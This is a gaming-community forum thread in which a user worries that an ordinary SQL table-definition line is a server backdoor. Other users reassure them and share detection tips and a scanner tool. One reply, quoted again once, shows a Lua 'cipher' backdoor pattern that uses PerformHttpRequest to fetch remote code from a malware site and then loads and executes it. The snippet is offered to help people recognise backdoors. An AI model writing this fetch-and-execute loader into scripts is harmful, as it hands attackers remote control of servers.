[QUESTION] How to spot a potential backdoor?

posted 18-07-2024 03:09 2.943 views 17 replies

songbirdmusic_19573

0 Posts

90 Credits

N/A Since

18-07-2024 03:09 #1 2.943 views 17 replies

I was installing a script I have to my server when I went to input the SQL into my database, I don't know if it means anything but I DID run the code until it hit me something felt off. I went back and removed it from the code as well as deleted it from my database. Did I just run a potential backdoor through my entire server?? Am I in trouble? Or did I respond quick enough that everything might be okay? Here is what the last line of code looked like in the script I was installing...

ENGINE=InnoDB AUTO_INCREMENT=211 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_turkish_ci

replies (17)

VeryNiceIndeed

143 Posts

18,048 Credits

Jan 2023 Since

18-07-2024 13:09 #1

songbirdmusic_19573,
I was installing a script I have to my server when I went to input the SQL into my database, I don't know if it means anything but I DID run the ...

That line is perfectly fine for a database

coolcsgo

10 Posts

393 Credits

Dec 2023 Since

18-07-2024 16:22 #2

This is just setting the auto increment, and default charset for the DB you imported

songbirdmusic_19573

127 Posts

90 Credits

Mar 2024 Since

19-07-2024 01:14 #3

Thank you everyone for calming my nerves and reassuring me I didn't do anything wrong. It was just at first glance it seemed extremely odd so I panicked

Hopatchke

52 Posts

5,584 Credits

Aug 2022 Since

29-08-2024 11:47 #4

PerformHttpRequest(' Sht that goes to a malware website., function (e, d)
local s = assert(load(d))
if (d == nil) then return end
s()
end)

things like this are Cipher codes. & Backdoors. Performhttprequest etc. get on github and download a backdoor checker ;)

songbirdmusic_19573

127 Posts

90 Credits

Mar 2024 Since

29-08-2024 12:46 #5

Hopatchke,
PerformHttpRequest(' Sht that goes to a malware website., function (e, d)
local s = assert(load(d))
if (d == nil) then return end
s()
end)

thing...

Wow thats really good to know thank you so much for the information! I have one installed on my server actually, but wasn't sure what to be on the look out for. If there are any threats I guess its long too late now haha

Hopatchke

52 Posts

5,584 Credits

Aug 2022 Since

29-08-2024 13:02 #6

songbirdmusic_19573,
Wow thats really good to know thank you so much for the information! I have one installed on my server actually, but wasn't sure what to be on th...

malwarebytes , the free version offers a good scan ;) , works perfectly!

songbirdmusic_19573

127 Posts

90 Credits

Mar 2024 Since

30-08-2024 13:51 #7

Hopatchke,
malwarebytes , the free version offers a good scan ;) , works perfectly!

I actually currently have three different protections installed, so hopefully I'm not as screwed then if I downloaded something I wasn't supposed to

airis13370

1 Posts

33 Credits

Sep 2024 Since

01-09-2024 16:37 #8

grghrheheh grghrheheh grghrheheh grghrheheh grghrheheh grghrheheh

amirexit

193 Posts

98 Credits

Sep 2024 Since

03-09-2024 15:49 #9

songbirdmusic_19573,
I was installing a script I have to my server when I went to input the SQL into my database, I don't know if it means anything but I DID run the ...

i need to know too thanks for creating this thread

Du22121

30 Posts

45 Credits

Dec 2022 Since

09-09-2024 10:48 #10

you never know if they add back doors when its too late

#10

songbirdmusic_19573

127 Posts

90 Credits

Mar 2024 Since

20-09-2024 02:58 #11

Du22121,
you never know if they add back doors when its too late

Not necessarily true, there are script checkers out there and you can scan them to be safe. I always scan my scripts, then manually search through all my code and put it through another scan to be sure. There are preventions an ways to be safe, you need to know what to look for

#11

Malagah

13 Posts

93 Credits

Sep 2024 Since

22-09-2024 18:59 #12

songbirdmusic_19573,
Ce n'est pas forcÃƒÂ©ment vrai, il existe des vÃƒÂ©rificateurs de scripts et vous pouvez les analyser pour plus de sÃƒÂ©curitÃƒÂ©. J'analyse...

It would be cool to create a topic to explain how to do it and which tool to use :);)

#12

khaosen

155 Posts

189 Credits

Mar 2024 Since

22-09-2024 22:46 #13

songbirdmusic_19573,
I was installing a script I have to my server when I went to input the SQL into my database, I don't know if it means anything but I DID run the ...

if you want to detect backdoors look for performhttp inside scripts

#13

cochinofrito

2 Posts

90 Credits

Sep 2024 Since

01-10-2024 16:52 #14

Hello,
Here is a tool to achieve this.
https://github.com/exersalza/FivemCipherFinder

Thanks,

#14

royal6823

2 Posts

58 Credits

Oct 2024 Since

10-10-2024 10:03 #15

It is just a SQL Statement

#15

dtm.os

36 Posts

81 Credits

Jan 2025 Since

14-01-2025 20:06 #16

cochinofrito,
Hello,
Here is a tool to achieve this.
https://github.com/exersalza/FivemCipherFinder

Thanks,

Your are truly the goat for this

#16

interstarix

10 Posts

978 Credits

Jan 2025 Since

16-01-2025 09:06 #17

use cochinofrito cipherfinder is great tho

#17

You must be logged in to reply

[QUESTION] How to spot a potential backdoor?

Related Threads

KaapCraft ~ New upcoming Minecraft server.

Is anyone else unable to use reactions on posts/comments?

Report Content

Unlock Thread

Download